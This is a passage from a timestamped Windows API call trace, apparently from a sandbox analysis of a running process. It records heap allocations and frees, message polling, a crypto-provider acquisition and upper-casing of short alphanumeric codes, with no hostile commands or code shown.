lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0254.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.728] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.728] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.731] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.731] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.731] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0254.731] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.732] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0254.732] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.732] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.732] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0254.732] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.732] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.733] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.733] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.733] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.733] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.733] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.734] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.734] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.734] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.734] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0254.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.734] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0254.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.735] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.735] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.736] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.736] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.736] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.736] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.736] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.737] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.737] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.737] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.737] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.737] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.737] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.737] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.738] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.738] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.738] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.738] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.738] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.739] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.739] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.739] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.739] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.739] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.739] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.740] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 